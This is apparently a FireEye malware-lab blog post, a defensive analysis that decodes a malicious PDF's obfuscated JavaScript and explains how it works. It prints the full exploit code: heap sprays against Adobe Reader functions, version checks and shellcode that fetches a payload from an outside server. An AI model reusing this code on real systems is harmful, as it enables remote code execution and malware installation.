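        rb"\b%d %d obj\b.*?stream\r?\n(.*?)endstream" % (obj_num, gen),
        re.DOTALL,
    )
    m = pattern.search(pdf_bytes)
    if m is None:
        return None
    # decompressobj() stops at the end of the zlib data and tolerates
    # the end-of-line bytes that sit before `endstream`.
    return zlib.decompressobj().decompress(m.group(1))
```

Typical use would be `inflate_object(data, *info_reference(data, b"Author"))` on the raw file contents. A real parser should honor /Length and the cross-reference table instead of pattern matching.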
If you don't want to have to deal with all that tedious mucking about with Javascript to decode, just do:
perl -ne 's/lka1//g; print(pack("H*",$_));'
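The same shortcut in Python, for those without Perl handy. It mirrors what the embedded Javascript ends up doing (swap every "lka1" for "%" and unescape the result) instead of packing hex directly; the function name decode_lka is hypothetical, and the sample input is just the first few units quoted above.

```python
from urllib.parse import unquote

def decode_lka(blob):
    """Mimic replace(/lka1/g, '%') followed by unescape()."""
    return unquote(blob.replace("lka1", "%"), encoding="latin-1")

# First six units of the decompressed stream shown above.
print(decode_lka("lka166lka175lka16elka163lka174lka169"))
```

The sample prints the start of the word "function", which is a good sign the decoding is on the right track.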
31 0 obj
<< /S /JavaScript /JS 32 0 R >>
endobj
32 0 obj
<<
/Filter /FlateDecode
/Length 159
>>
stream
Uncompressed:
var xyuvam = 'lka';
var z = unescape;
var yhahahahahahavvvvvv = 'p'+z(%6c%61%63%65)+'(/';
eval('var bolshayapizdavam = '%';var nenadoAVscaner = '1/g,bolshayapizdavam)';');
eval('var bu'+'hae'+'ca = ev'+'a'+'l;');
endstream
endobj
33 0 obj
<< /S /JavaScript /JS 34 0 R >>
endobj
34 0 obj
<<
/Filter /FlateDecode
/Length 102
>>
stream
Uncompressed:
buhaeca('var xyuznaet = this.in'+z(%66%6f%2e%61%75%74)+'hor;');
var poxyunavse = 'xyuznaet.re';
endstream
endobj
Obviously, %66%6f%2e%61%75%74 is fo.aut, so gluing that all together, it becomes this.info.author; otherwise known as Object #51 (see elsewhere).
35 0 obj
<< /S /JavaScript /JS 36 0 R >>
endobj
36 0 obj
<<
/Filter /FlateDecode
/Length 88
>>
stream
Uncompressed:
var lkaa = poxyunavse + yhahahahahahavvvvvv +xyuvam+ nenadoAVscaner;
var xxx = buhaeca(lkaa);
endstream
endobj
37 0 obj
<< /S /JavaScript /JS 38 0 R >>
endobj
38 0 obj
<<
/Filter /FlateDecode
/Length 60
>>
stream
Uncompressed:
var ietoktoewe = z(unescape(xxx));
buhaeca(ietoktoewe);
endstream
endobj
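Replaying the string concatenation from those four script objects outside of Acrobat makes it clear what finally gets handed to eval. A Python sketch that reuses the sample's own variable names; unquote stands in for Javascript's unescape, source_expr is a name I made up, and nothing is evaluated here, only printed:

```python
from urllib.parse import unquote

z = unquote                                    # var z = unescape;

# Object 32
xyuvam = "lka"
yhahahahahahavvvvvv = "p" + z("%6c%61%63%65") + "(/"
bolshayapizdavam = "%"
nenadoAVscaner = "1/g,bolshayapizdavam)"

# Object 34: the expression whose value is stored in xyuznaet
source_expr = "this.in" + z("%66%6f%2e%61%75%74") + "hor"
poxyunavse = "xyuznaet.re"

# Object 36: the statement that is passed to the aliased eval
lkaa = poxyunavse + yhahahahahahavvvvvv + xyuvam + nenadoAVscaner

print(source_expr)
print(lkaa)
```

So the chain reads the Author metadata, replaces every "lka1" with "%", and object 38 unescapes and evals the result.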
So, one of the odd things about this PDF is that there are several object names defined, but I don't see them used anywhere. (In short, you can rename objects from 123 00 R to something easier to remember, like /Bob.)
48 0 obj
<< /Names [(xyak) 31 0 R (fuckinshit) 33 0 R (komonogirsl) 35 0 R (komonogirsls) 37 0 R ]
>>
endobj
Also, Object #5 and Object #14 are empty. These are info.Title and info.Producer, respectively.
5 0 obj
<<
/Filter /FlateDecode
/Length 0
>>
stream
endstream
endobj
14 0 obj
<<
/Filter /FlateDecode
/Length 0
>>
stream
endstream
endobj
51 0 R Decoded
function fix_it(yarsp,len){while(yarsp.length*2<len){yarsp+=yarsp;}yarsp=yarsp.substring(0,len/2);return yarsp;}
function printd(){var shellcode = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34
%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B
%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324
%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B
%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455
%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF
%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u382F%u2E35%u3031%u322E%u3334%u312E%u3532%u622F%u6862%u6C2F%u616F
%u2E64%u6870%u3F70%u7073%u3D6C%u6470%u5F66%u656E%u0077");var block = unescape("%u0c0c%u0c0c");
var GDagaCuyNfRSFzaSZLO = unescape("%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u514e%u4865%u4844%u724f%u4a6e
%u6d43%u4b51%u4b79%u7156%u4d41%u5944%u596b%u7979%u625a%u626f%u7a6e%u634e%u4a4d%u6341%u6253%u4154%u5670%u5543%u4273
%u4c51%u576d%u5772%u5670");while(block.length <= 32768) block+=block;block=block.substring(0,32768 - shellcode.length);
memory=new Array();for(i=0;i<0x2000;i++) {memory[i]= block + shellcode;}util.printd("rlpPpjTXXIncUhwagCzcuHfmkzObBSZDGNdC",
new Date());util.printd("SotSxNQvMqKNjJkIXioKlmfZYfmiPGgGNNKn", new Date());try {this.media.newPlayer(null);} catch(e)
{}util.printd(GDagaCuyNfRSFzaSZLO, new Date());} function util_printf(){var payload=unescape("%uC033%u8B64%u3040
%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44
%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150
%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56
%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865
%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56
%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60
%u0455%u7468%u7074%u2F3A%u382F%u2E35%u3031%u322E%u3334%u312E%u3532%u622F%u6862%u6C2F%u616F%u2E64%u6870%u3F70%u7073
%u3D6C%u6470%u5F66%u6170%u6B63");var nop=unescape("%u0A0A%u0A0A%u0A0A%u0A0A"); var heapblock=nop+payload;
var bigblock=unescape("%u0A0A%u0A0A");var headersize=20;var spray=headersize+heapblock.length;
while(bigblock.length<spray){bigblock+=bigblock;} var fillblock=bigblock.substring(0,spray);var block=bigblock.substring(0,bigblock.length-spray);while(block.length+spray<0x40000){block=block+block+fillblock;}
var mem_array=new Array();for(var i=0;i<1400;i++){mem_array[i]=block+heapblock;}
var num=129999999999999999998888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888
88888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888
888888888888888888888888888888888888888888888888888888888888888888;util.printf("%45000f",num);} function collab_email(){
var shellcode=unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44
%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150
%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56
%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865
%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56
%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60
%u0455%u7468%u7074%u2F3A%u382F%u2E35%u3031%u322E%u3334%u312E%u3532%u622F%u6862%u6C2F%u616F%u2E64%u6870%u3F70%u7073
%u3D6C%u6470%u5F66%u6170%u6B63");var mem_array=new Array();var cc=0x0c0c0c0c;var addr=0x400000;var sc_len=shellcode.length*2;
var len=addr-(sc_len+0x38);var yarsp=unescape("%u9090%u9090");yarsp=fix_it(yarsp,len);var count2=(cc-0x400000)/addr;for(
var count=0;count<count2;count++){mem_array[count]=yarsp+shellcode;} var overflow=unescape("%u0c0c%u0c0c");
while(overflow.length<44952){overflow+=overflow;} this.collabStore=Collab.collectEmailInfo({subj:"",msg:overflow});}
function collab_geticon(){if(app.doc.Collab.getIcon){var arry=new Array();var vvpethya=unescape("%uC033%u8B64%u3040%u0C78
%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455
%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA
%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA
%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D
%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856
%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u382F%u2E35%u3031%u322E%u3334%u312E%u3532%u622F%u6862
%u6C2F%u616F%u2E64%u6870%u3F70%u7073%u3D6C%u6470%u5F66%u6170%u6B63");var hWq500CN=vvpethya.length*2;var len=0x400000-(hWq500CN+0x38);
var yarsp=unescape("%u9090%u9090");yarsp=fix_it(yarsp,len);var p5AjK65f=(0x0c0c0c0c-0x400000)/0x400000;for(
var vqcQD96y=0;vqcQD96y<p5AjK65f;vqcQD96y++){arry[vqcQD96y]=yarsp+vvpethya;} var tUMhNbGw=unescape("%09");
while(tUMhNbGw.length<0x4000){tUMhNbGw+=tUMhNbGw;} tUMhNbGw="N."+tUMhNbGw;app.doc.Collab.getIcon(tUMhNbGw);}}
function PPPDDDFF(){var version=app.viewerVersion.toString();version=version.replace(/\D/g,'');
var varsion_array=new Array(version.charAt(0),version.charAt(1),version.charAt(2));
if((varsion_array[0]==8)&&(varsion_array[1]==0)||(varsion_array[1]==1&&varsion_array[2]<3)){util_printf();}
if((varsion_array[0]<8)||(varsion_array[0]==8&&varsion_array[1]<2&&varsion_array[2]<2)){collab_email();}
if((varsion_array[0]<9)||(varsion_array[0]==9&&varsion_array[1]<1)){collab_geticon();} printd(); } PPPDDDFF();
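The version checks in PPPDDDFF() at the very end decide which exploit functions get called, and they are easy to misread in the original. Here is a Python transcription of just that logic, as a sketch: it takes the viewer version as text, treats a missing digit as 0 (which is how the empty string behaves in those Javascript comparisons), and keeps the original operator precedence. The helper names digits and exploits_for are hypothetical.

```python
import re

def digits(version_text):
    """First three digits of the version string; missing ones act like 0."""
    only = re.sub(r"\D", "", version_text)
    return [int(only[i]) if i < len(only) else 0 for i in range(3)]

def exploits_for(version_text):
    """List the functions PPPDDDFF() would call, in order."""
    a, b, c = digits(version_text)
    chosen = []
    # && binds tighter than ||, so the second clause has no major-version check.
    if (a == 8 and b == 0) or (b == 1 and c < 3):
        chosen.append("util_printf")
    if a < 8 or (a == 8 and b < 2 and c < 2):
        chosen.append("collab_email")
    if a < 9 or (a == 9 and b < 1):
        chosen.append("collab_geticon")
    chosen.append("printd")          # called unconditionally at the end
    return chosen

for v in ("7.0", "8.12", "9.1", "9.2"):
    print(v, exploits_for(v))
```

If I'm reading the precedence right, a viewer reporting 9.1 would also be handed util_printf(), since the second half of that first condition only looks at the minor digits.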
And these seem to be on this exact same topic:
http://isc.sans.org/diary.html?storyid=7906
¹ I'm not 100% certain that it is Neosploit doing this, as I'm only looking at this toolkit's output.
² Neosploit and Mebroot go together like peanut butter and chocolate.
³ It looks almost exactly like the simple example in Annex H of the PDF specification.
⁴ This is a bit of an oversimplification. I'm leaving out all the stuff about cross reference streams, and reconstructing a file if the xref table is damaged or missing.
Julia Wolf @ FireEye Malware Intelligence Lab
Questions/Comments to research [@] fireeye [.] com